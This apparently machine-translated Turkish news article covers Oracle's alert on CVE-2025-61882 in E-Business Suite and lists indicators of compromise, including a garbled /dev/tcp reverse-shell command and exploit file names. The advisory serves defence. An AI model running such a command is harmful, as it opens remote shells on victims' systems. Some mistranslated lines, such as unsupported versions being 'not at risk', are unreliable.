Oracle, yaygın olarak kullanılan Oracle e-Business Suite’ında sıfır gün güvenlik açığı için bir güvenlik uyarısı uyarı kullanıcıları yayınladı. CVE-2025-61882 olarak izlenen bu kusur, kimlik doğrulanmamış, uzak saldırganların etkilenen sistemlerde keyfi kod yürütmesine izin verir. Güvenlik açığı, 9.8 CVSS V3.1 taban puanı taşıyor ve bu da onu bugüne kadar platform için en kritik tehditlerden biri haline getiriyor.
CVE-2025-61882 hedefleri
Oracle’ın danışmanlığına göre, CVE-2025-61882, özellikle BI yayıncı entegrasyonunda, e-iş süitinin eşzamanlı işleme bileşeninde bulunuyor. HTTP aracılığıyla kullanılabilir olan kusur, kullanıcı kimlik bilgileri veya etkileşimi gerektirmez ve bir ağ üzerinden yürütülebilir.
Uyarı ile yayınlanan risk matrisi, saldırı vektörünün düşük karmaşıklık ve ayrıcalıklara ihtiyaç duymadığı “ağ” olduğunu göstermektedir. Başarılı sömürü, gizlilik, dürüstlük ve kullanılabilirlik üzerinde yüksek bir etki yaratır. Oracle kategorik olarak belirtiyor:
“Bu güvenlik açığı, kimlik doğrulaması olmadan uzaktan sömürülebilir… başarıyla sömürülürse, uzaktan kod yürütülmesine neden olabilir.”
Güvenlik açığı, Oracle E-Business Suite Sürümleri 12.2.3 ila 12.2.14’ü etkiler. Oracle, tüm müşterileri gecikmeden gerekli güvenlik güncellemelerini uygulamaya teşvik eder.
Etkilenen sürümler, yama gereksinimleri ve destek sınırlamaları
CVE-2025-61882’yi ele alan yamayı yüklemeden önce, kullanıcılar sistemlerinin Ekim 2023 Kritik Yama Güncellemesini (CPU) zaten uyguladığından emin olmalıdır. Bu önceki güncelleme, Ekim 2025 uyarısında yayınlanan mevcut düzeltmeleri uygulamak için bir ön koşuldur.
Oracle, yalnızca Premier Destek veya Genişletilmiş Destek altındaki sürümlerin, ömür boyu destek politikası ile tanımlandığı gibi yamalar alacağını belirtiyor. Denetim dışı versiyonları çalıştıran sistemler, teknik olarak savunmasız olsa bile bu güvenlik açığına karşı test edilmez ve risk altında kalmaz.
Şirketin rehberliği vurgular:
“Oracle, müşterilerin Güvenlik Uyarısı Programı aracılığıyla yayınlanan yamaların şu anda yürüttükleri sürümler için mevcut olmasını sağlamak için ürün yükseltmeleri planlamalarını öneriyor.”
Etkilenen ürün ve yama bilgileri, desteklenen her sürüme uyarlanmış adım adım kurulum talimatları sağlayan Oracle’ın Patch Kullanılabilirlik Belgesi aracılığıyla kullanılabilir.
Tespit, uzlaşma göstergeleri ve anında azaltma adımları
Oracle, kuruluşların CVE-2025-61882’yi içeren potansiyel saldırıları tespit etmesine ve bunlara yanıt vermelerine yardımcı olmak için kapsamlı bir uzlaşma göstergesi (IOCS) içermektedir. Listede şüpheli IP adresleri, gözlemlenen kabuk komutları ve bilinen istismar dosyalarının SHA – 256 karmalarını içerir.
Uzlaşmanın temel göstergeleri:
Şüpheli IPS:
- 200[.]107[.]207[.]26
- 185[.]181[.]60[.]11
Kötü niyetli komut:
- sh -c/bin/bash -i> &/dev/tcp // 0> & 1
İlişkili dosya karmalar ve istismar örnekleri:
- Oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
- Exp.py– Server.py -Her biri ilişkili SHA-256 Hashes ile.
Ayrıca, GitHub’da halka açık bir algılama yöntemi mevcuttur. Bu araç, HTTP yanıtının “e-Business Suite Ana Sayfası” dizesini içerip içermediğini ve Son modifiye edilmiş Başlık 4 Ekim 2025’ten önce bir zaman damgası gösterir (UNIX zaman damgası 1759602752). Yöntem kesinlikle savunma kullanımı içindir ve bir istismar olarak tasarlanmamıştır.
Oracle ayrıca yöneticilere risk matrisindeki (HTTP) protokol listesinin tüm güvenli varyantların (HTTP gibi) de etkilendiğini ima ettiğini hatırlatır. Kullanıcılar için tavsiye edilir Desteklenen sürümleri güncelleyin, henüz yapılmadıysa Ekim 2023 CPU’yu uygulayın ve hemen Ekim 2025 yamasını yükleyin. Bu arada, listelenen IOC’ler için izleme sistemleri, devam etmekte olan potansiyel sömürü girişimlerini tespit etmeye ve içermeye yardımcı olabilir.